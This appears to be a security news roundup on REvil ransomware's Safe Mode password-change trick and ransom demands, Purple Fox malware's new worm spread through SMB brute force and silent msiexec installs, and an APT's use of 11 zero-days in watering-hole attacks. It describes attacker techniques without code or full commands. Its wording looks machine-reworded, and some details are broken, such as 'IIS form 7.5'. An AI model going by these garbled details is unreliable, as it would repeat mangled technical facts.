Last month, security researcher R3MRUM discovered a new sample of the REvil ransomware that improves the new Safe Mode encryption method by changing the logged-on user’s password and setting Windows to automatically login on reboot. The ransomware would update the user's password to ‘DTrump4ever’ if the -smode statement is used. 

Afterward, the ransomware configures the following Registry values for Windows to automatically log in with the new account information. It is currently unknown whether new REvil ransomware encryptor samples will continue to use the ‘DTrump4ever' password, but at least two samples submitted to VirusTotal in the last two days have done so. 

This latest strategy exemplifies how ransomware groups are actively refining their tactics in order to effectively encrypt users' devices and demand a ransom payment. 

Asteelflash, a world-leading French EMS company, confirmed last week that it has been the target of a cybersecurity incident, identifying the involvement of REvil ransomware. After initially setting the ransom at $12 million in Monero crypto, the attackers demanded Asteelflash pay a whopping $24 million ransom. However, as the negotiations didn’t reach a point of agreement in time, the actors raised the ransom to double the amount and leaked the first sample of the exfiltrated files. 

Acer, a computer manufacturer, was also hit by the REvil ransomware. REvil has demanded a ransom of $50 million, which may be the highest ever demanded ransom.

REvil has released a service for contact to news media, companies for the best pressure at no cost, and DDoS (L3, L7) as a paid service. Threat actors, or associated partners, will perform voice-scrambled VoIP calls to the media and victim’s business partners with information about the attack.

New Worm Capabilities Targets Windows Machines

 

A malware that has verifiably targeted exposed Windows machines through phishing and exploit kits have been retooled to add new "worm" capabilities. Purple Fox, which originally showed up in 2018, is an active malware campaign that as of, not long ago required user interaction or some kind of third-party tool to infect Windows machines. However, the assailants behind the campaign have now upped their game and added new functionality that can force its way into victims' systems on its own, as indicated by new Tuesday research from Guardicore Labs.

“Guardicore Labs have identified a new infection vector of this malware where internet-facing Windows machines are being breached through SMB password brute force,” Guardicore Labs Amit Serper said. In addition to these new worm abilities, Purple Fox malware now additionally incorporates a rootkit that permits the threat actors to conceal the malware on the machine and make it hard to distinguish and eliminate, he said. 

Researchers examined Purple Fox's most recent activity and discovered two huge changes to how assailants are spreading malware on Windows machines. The first is that the new worm payload executes after a victim machine is undermined through a weak exposed service. Purple Fox additionally is utilizing a past strategy to contaminate machines with malware through a phishing effort, sending the payload by means of email to exploit a browser vulnerability, researchers observed. When the worm infects a victim's machine, it creates a new service to establish persistence and execute a simple command that can iterate through a number of URLs that include the MSI for installing Purple Fox on a compromised machine, said Serper. 

“msiexec will be executed with the /i flag, in order to download and install the malicious MSI package from one of the hosts in the statement,” he explained. “It will also be executed with the /Q flag for ‘quiet’ execution, meaning, no user interaction will be required.”

Gadgets caught in this botnet incorporate Windows Server machines running IIS form 7.5 and Microsoft FTP, and servers running Microsoft RPC, Microsoft Server SQL Server 2008 R2, and Microsoft HTTPAPI httpd 2.0, and Microsoft Terminal Service.

Hackers used 11 Zero-Days to Attack Windows, iOS, Android Users

 

Malware trackers at Google keep on pointing out a complex APT group that burned through at least 11 zero-days exploits in less than a year to conduct mass spying across a range of platforms and gadgets. The group has effectively utilized "watering hole" assaults to divert explicit targets to a couple of exploit servers conveying malware on Windows, iOS, and Android gadgets. 

The cross-platform capacities and the readiness to utilize almost a dozen zero-days in under a year signals a well-resourced threat actor with the ability to access hacking tools and exploits from related groups. In another blog post, Google Project Zero researcher Maddie Stone released additional details on the exploit chains found in the wild last October and cautioned that the most recent disclosure is attached to a February 2020 campaign that incorporated the utilization of multiple zero-days. As per Stone, the threat actor from the February 2020 campaign went dark for a couple of months but returned in October with dozens of websites redirecting to an exploit server. 

“Once our analysis began, we discovered links to a second exploit server on the same website. After initial fingerprinting (appearing to be based on the origin of the IP address and the user-agent), an iframe was injected into the website pointing to one of the two exploit servers. In our testing, both of the exploit servers existed on all of the discovered domains,” Stone explained. 

The first exploit server at first reacted distinctly to Apple iOS and Microsoft Windows user-agents and was active for at least a week after Google's researchers began recovering the hacking devices. This server included exploits for a distant code execution bug in the Google Chrome rendering engine and a v8 zero-day after the underlying bug was fixed. Stone said the first server momentarily reacted to Android user-agents, proposing exploits existed for every one of the significant platforms.

Stone noticed that the assailants utilized a special obfuscation and anti-analysis check on iOS gadgets where those exploits were encrypted with ephemeral keys, “meaning that the exploits couldn't be recovered from the packet dump alone, instead of requiring an active MITM on our side to rewrite the exploit on-the-fly.”